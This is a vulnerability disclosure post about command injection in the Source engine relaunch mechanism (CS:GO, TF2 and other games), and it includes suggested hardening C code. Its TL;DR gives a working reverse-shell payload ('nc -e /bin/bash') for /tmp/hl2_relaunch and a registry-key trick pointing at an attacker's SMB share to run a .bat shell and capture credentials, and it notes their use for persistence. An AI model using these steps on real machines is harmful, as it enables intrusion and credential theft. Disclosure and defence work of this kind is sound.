Code Execution within Source Engine Game
CS:GO BuildID: 4937372 -> Current
TF2 BuildID: 4871679 -> Current
Garry’s Mod BuildID: 4803834 -> Current
Half Life 2 BuildID: 4233302 -> Current
Note: this vulnerability seems to date back further than the listed build numbers, however I have only tested back to them.
This seems to be an issue within the Source engine itself and should be present in all Source games. However, I have only tested the games listed above.
TL;DR: On MacOS, place ";nc -e /bin/bash ip port" (or whatever you want for a shell) into /tmp/hl2_relaunch, open and close CS:GO, and you have a shell on MacOS as whoever runs the game. On Windows, add a registry key named Relaunch URL to Computer\HKEY_CURRENT_USER\Software\Valve\Source. However, we can only call programs; thankfully we can use SMB/any UNC path to call a remote file (and get creds while we're at it), so set it to \\ip\share\file and boom.
However, on line 98 the file is defined for OSX.
On OSX, the launcher checks to see if the file ‘/tmp/hl2_relaunch’ exists; if it does, then it creates the szCMD variable. If the file has stuff within it (it 99.9% of the time will), then it will add ‘open’ to the start and send it out as a system call. The issue with this is that there is no input validation, meaning, as I showed before, we can just add ; and it’ll execute anything we wish after.
For Windows, it checks to see if the registry key HKEY_Current_User\Software\Valve\Source exists, then, if it does, whether ReLaunch URL exists within it; if it does, it calls the ShellExecute Open function with the value of the registry key (docs for ShellExecute here). This means it’ll run an executable or open the attached program, and since the values “0, 0” are set we are unable to add parameters. However, we are able to specify a remote SMB path, so if we set the registry key to an SMB server we control containing a malicious file (I tested with a .bat running a rev shell command), using this method we can also fetch users’ credentials.
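The root cause on both platforms is that untrusted file or registry content reaches a launcher (system() on OSX, ShellExecute on Windows) without validation. The following is an added example of how the OSX relaunch path could be hardened; it is not Valve's code, and it assumes the legitimate content of /tmp/hl2_relaunch is a single steam:// URL (an assumption, not something the write-up states). The same allow-list check belongs in front of ShellExecute on Windows, where a UNC path would fail the scheme test.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define RELAUNCH_FILE "/tmp/hl2_relaunch"   /* path named in the write-up */
#define MAX_URL 1024

/* Copy the first line of raw into url and accept it only if it is a steam:// URL
 * (assumed legitimate format) built from plain URL characters. Returns 1 on accept. */
int parse_relaunch_url(const char *raw, char *url, size_t urlsz)
{
    static const char allowed[] = "-._~:/?=+%@,";  /* ';' '|' '`' '$' quotes, spaces fail */
    size_t n = strcspn(raw, "\r\n");
    if (n == 0 || n >= urlsz) return 0;
    memcpy(url, raw, n);
    url[n] = '\0';
    if (strncmp(url, "steam://", 8) != 0) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)url[i];
        if (!isalnum(c) && strchr(allowed, c) == NULL) return 0;
    }
    return 1;
}

/* Read the relaunch file once, validate it, then run `open <url>` with fork/execvp:
 * argv goes straight to the program, so /bin/sh never parses the file contents. */
int relaunch_from_file(void)
{
    char raw[MAX_URL], url[MAX_URL];
    FILE *f = fopen(RELAUNCH_FILE, "r");
    if (f == NULL) return 0;                    /* nothing to relaunch */
    int ok = fgets(raw, sizeof raw, f) != NULL;
    fclose(f);
    unlink(RELAUNCH_FILE);                      /* single use */
    if (!ok || !parse_relaunch_url(raw, url, sizeof url)) {
        fprintf(stderr, "relaunch: rejected contents of %s\n", RELAUNCH_FILE);
        return 0;
    }
    pid_t pid = fork();
    if (pid == 0) {
        char *argv[] = { "open", url, NULL };
        execvp("open", argv);
        _exit(127);                             /* exec failed */
    }
    int status = 0;
    if (pid > 0) waitpid(pid, &status, 0);
    return pid > 0 && WIFEXITED(status) && WEXITSTATUS(status) == 0;
}
```

Moving the handoff file out of the world-writable /tmp into a per-user directory removes the www-data-to-player scenario described later in the post entirely; the allow-list is the defence-in-depth layer if the path stays.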
This issue was reported to Valve on 22/04/2020 via HackerOne and denied due to
Which I find very confusing, since that line of the scope was taken from the following
Which states RCE must follow those 3 statements, not an LPE or a local arbitrary code execution (depends on how you classify the bug). While I do see that this bug would have a low broader impact, in certain scenarios it could have more serious impacts. As an example, a dev could self-host a web server on their machine and it could be compromised; this bug would allow them to place the file in /tmp as www-data and get a shell as the user who plays CS:GO (or any Source game) next, or this could also be used as a way to maintain access to a box. Set the file in /tmp and if you lose the shell, just wait for them to play CS:GO (or any Source game). Anyway, that is why this is being disclosed this way instead of via HackerOne.